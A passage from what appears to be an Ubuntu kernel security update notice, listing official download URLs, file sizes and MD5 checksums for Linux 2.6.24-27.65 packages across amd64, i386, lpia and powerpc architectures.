967a98f6cfa9c56dcecbe0872e98b617\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    39194 5ad172f156b5e2ba43fee3a69a09fb49\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    67996 9ca474a40f4225116d7d9befcde4dbb5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   145458 3e087634d61556643c32e342214a0642\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   287262 202933f0bb0a3d09ae278a991139eaf1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:  2130554 f0a40b4f0002803063b074d4b2b22775\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_amd64.deb\n      Size/MD5:   673974 3ee01bd889b29b761f96eab35f839815\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_amd64.deb\n      Size/MD5:  1252948 e0734c904a26acf9daadc8dc13a5331c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_amd64.deb\n      Size/MD5:  1274832 4784ef460e510677dd0c62ba0e5d75a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_amd64.deb\n      Size/MD5:   674092 b2b2090661ff113ec00e1b08627238c3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_amd64.deb\n      Size/MD5:  1084370 ef5cd734b586855f7b94d5b93bb51c42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_amd64.deb\n      Size/MD5: 17809172 46d4f01f3cb62fc8c006c25d291bdbde\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_amd64.deb\n      Size/MD5: 17781410 589743282c76d9ae95751cefae7dcd1f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_amd64.deb\n      Size/MD5: 21055946 71c5ed78b283260aa76abe43a5199869\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_amd64.deb\n      Size/MD5: 21440010 76e220b0a64e1b1fb76a54aaa5cde808\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_amd64.deb\n      Size/MD5:   707586 4d51f71c8ac5227c9f02fbc0c6552453\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   263678 73ef23d338fe298802ae13ea52af05a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   176420 0709db4bda579f5146063e7bedeef8cf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   254102 7b20912de5e61b0206319019c4800ef1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:  1641364 98d7399720bae5a9d3e1637cc6f13ce9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   143718 419053c97211aea3dd9b2aa0833bc6bc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   164466 16e2d4ad08a10d9e9d2b33dbee4c08ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   115858 74f2c34acf328f485356f38e86eb6aa2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    35056 5307b10f96b76f43c0bf983007f36021\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    64412 7cf4750ba6f0dd63678eae705da55fbf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    69706 dedcbc58256ac2a43ed625eb7cae6e81\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    21598 6d6c27b8756a70466451449e096bd149\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:     8622 4414757aa7034cafa1e98d8bacf080f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    57232 8690d6c34e1ec87d85b2c20cb280acb9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   103044 73c875b66060da7f1d39f2a5f8eecf36\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:  1212518 6e237c8e863f3cea5cc702afbd925b77\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    45500 1883d8bdf4ed7b2aebc1a407502bd556\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    12780 fa12802bfa4f6847c5409d4882e9aa9a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   498032 d5e81ea5e16357ae1be8c0ac77685256\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    75048 24c6c2fa1972611542270d68ccae59a6\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_amd64.deb\n      Size/MD5: 19256730 d7f5e8ae9464748ac2a6dbc46ed9f1c1\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_amd64.deb\n      Size/MD5: 17909990 e4e3916570b7b5f06645d2623111b0ef\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_amd64.deb\n      Size/MD5: 18911564 fd71e9397f8919af683848aa456c885f\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    23690 ceb5d148f00965516252470b41d00b56\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    26794 50bb7020338de7d00265de0765578291\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   218818 a3b52dd67e9817d4e60d8b048f542717\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   220482 60bf430685f9b39568dbb078edf6041c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    51932 f708bc6cc86f313031745601d3d31aa9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    52068 bd20c8c1eb151b2b8d989d5081f8386b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    38326 aeea101daeed1f87bb30f67c4011d737\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    39080 b8fc6fd4c6fa20a8cf2a92e150a1b969\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    45990 9c06ca831da0f4183ef6e15af4e9b3cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    46170 8d8cb61faaaf267e135ecd2844afd195\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    83246 6941b39723fc655f7dcf2846e5c8a47e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    83662 d3f22aca87d23a99c75b3e6464eb22fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    32396 402518c87d72b3dfc41656de51ebaa64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    32672 7135f346092b651dafed111b91aee44d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   637694 e32a7d7a367597e18b305f6d97b93630\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   655982 7e8f7f69c261eaa0ce58ddb865205698\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   209878 1ca7ab42cb7cd39e37e711fabaae8b99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   213640 bfc69b0b0b29485a95605fe7e091dd5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    46544 90ef4a74882d5770a3f7d888ba288b35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    47602 e55422dc48484675642c96bdbc673595\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    62270 cc798227f68e2c8c1d8a54b03bf0058a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    63626 a2d3587a68e63d2cf90e1cd3790d1079\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   130538 c07adcef7438ef51821f9a8b750f7973\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   137028 068fdde4394c7850abba6ea81e69c801\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   279080 76c07612b0081c38122b1929c7f19f34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   277690 c635d04d78592fe9792024e84682ccc7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  2012458 d372c1d872861cd7c84ea9d06c4e8162\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  2089276 69416120cd161789b598b2b93034db07\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.65_i386.deb\n      Size/MD5:   655314 4adb56a8d5211bba1acc02d76e9fb65d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_i386.deb\n      Size/MD5:   658154 7d6f7bccbf83f9a32664588ab5faaabe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_i386.deb\n      Size/MD5:  1242098 c22eebab07e9ce3d85526ce2945da263\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_i386.deb\n      Size/MD5:  1262772 85fe04ee16e27b961017cf148c4f1d21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_i386.deb\n      Size/MD5:   659870 a3ebd23356d57307d124b62faf3fc2a2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.65_i386.deb\n      Size/MD5:   561726 410d756762ce992d36864ce38efc2e1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_i386.deb\n      Size/MD5:  1059932 350947cab60fcafb13483ab14ca0ff95\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.65_i386.deb\n      Size/MD5: 18380540 1da620cffb3b62617fc8213134b951e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_i386.deb\n      Size/MD5: 18401264 dd7b7991e7f843ebcae7bc5c8700636d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_i386.deb\n      Size/MD5: 18513796 c8b5dac38c445a72681bd5dd1c9a1f98\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.65_i386.deb\n      Size/MD5:  8730742 fc3305910b00833b509a4e34199e4a67\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.65_i386.deb\n      Size/MD5: 25540786 ce01c05207f08195efd8b88b83a93549\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_i386.deb\n      Size/MD5: 26356028 ed8deb0b2243fd649476c43d245a9690\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_i386.deb\n      Size/MD5: 27372622 d07e093dc192ad5a49be8c45b5c85dd4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.65_i386.deb\n      Size/MD5: 24872642 c28ebc89c9a427352186dea53d81ffe8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_i386.deb\n      Size/MD5:   707576 d26794effd4e857da1db4d28e9407611\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   258852 b86f8c37480cbd19131432c908013dd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   264136 631fc78981097e46ee5643ec3cfc5616\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   163268 1c98e7380c4f80c461a6181344914fea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   163034 9cc84b270528d0fef36320974b415392\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   236710 755a3caeceece8650e46706804c6e072\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   244984 cc330be20f314b308aa0fbcf95c0370c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1810274 169e24dc79c5fbde1ca1a2a5520286d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1827436 cf166d9cdca76a06fd78b1a0669ed67b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   150836 169c287e6bc754d02924a719d34aad29\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   143018 ee925199234ec977618a5c3c3b03954f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   156072 9ff98bc4b62d033785de95858201c353\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   157158 75cdc15de6d5bdc90e05789eb00fe29d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   107222 37ce3c67bd74d5040aa4d22223cbb486\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   108526 7e50df25fcc29d44c2cfdc3e5c046a66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    32958 b1b4b1a1b95db3b09923a39eb42c28e4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    33388 860c1b56a45914246929757c815f5ec4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    60694 99aca1f49a5cd919f85ef1600ca757ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    61158 bbe05be947e606b614108423a7ca0b83\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    82652 8ffbf8ae116bd81b7632e2e3a58e0a76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    82954 1532b447c1a1cc43d1cbf46b1e14020f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    48562 d2569ab07923f67de18ed6c63940351c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    48452 dcf73534ccf880da82f6ec8bdad54db7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:     8192 2c3bac93f50147f7f67fffdcbb601b66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:     8444 375a2103e5890c501433ae5b3d912fbb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    51104 8d242482ce8adca7ec8f5d0a40c04c20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    52950 8449d644f2a2455da01bf48922757fd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    92156 232f32e69ea0f4daf4a17ad68542e45f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    92446 6525df043e2a865a6eb646f015140e31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1443710 2746c7d1f27f2638dd6f141c5d7e68ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1427036 d049929f20e6cbec8c7338977af873a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    43240 53538a90e2ae8dae72a91a8aa79ecb90\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    42806 3b1d48b0e38b9acebe7581278a8e0408\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    11402 83264faacaa7ff9c249144d8dd0061b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    12016 7e17c39f818116eae09203af5f5dd870\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   470484 bede1d05dc08ab51105feaff29b39093\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   472422 d08cc1bf2e88df1908f35afc77fd696a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    70518 751bdd069d86773b5a3cfc67a09b46a4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    71382 3aa45fd7cdb245416c60a2210066a353\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_i386.deb\n      Size/MD5: 20248150 fad37a976e62eb5c73f906fd44070b5a\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_i386.deb\n      Size/MD5: 18543176 2f3a767f3505c51ebac878d921d3f3d8\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_i386.deb\n      Size/MD5: 18782962 8a5a3287d174aa7fd1cceb71be94f347\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.65_lpia.deb\n      Size/MD5:   639434 d3cfd21a90ea311f0b1efa2ac28dfac0\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb\n      Size/MD5:   705462 81a381fb023a0e0074d8cfaa7fca88b8\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_lpia.deb\n      Size/MD5:   707532 c6bf8f82d8bbc4e2320343f58629a562\n    http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.65_lpia.deb\n      Size/MD5: 14516344 29b153dcb44d72c1e5862191cb266c6b\n    http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb\n      Size/MD5: 19816106 947ff90add29d1fc18a69145f39341d1\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   334046 06512921aae848be603af54dc56f72e6\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   318530 4e8164b49e3ad90d33c9275bd1c7b45d\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    62718 e53308b729496be4a0e343535769c74e\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    73002 10bf1560cb8abc507ea079f6a495f91b\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    41442 a9d6733876fcf91a271eb189eaffcb37\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    47826 1d54194b81d12ac7b00b910f625f7a59\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    89506 1d66e8fc56eb6437f783cb677e6c7061\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   105746 034c14e0418581e1b8b56913246e96de\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    44824 5430e2953cc84d26fd0c8e8c4e323a92\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    40932 93dc2a167cf8ab1d80426dd296997295\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   704830 ef370acc49192e464ef553984e361d88\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   770960 ac691fac4ab28cb6d9627fa6b7a5b773\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   243328 b280fefee27294e988529239616e68fe\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   246310 c1d7e140ca2ba026b6a168c6c9748476\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    69160 665a09e07612701e5c6bc7efee856e5c\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   132586 f0e732beade4d5154e887aaa1b1f3625\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    70252 d8f056e2c9d8aabe9acacfbe4e6c9de0\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    77462 d69a84be1856d83b83faf1fa820803f6\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   146272 11a1d0911e3fda9667661975972e08b2\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   165002 c4276844b0ea79946508c0cd3a816541\n    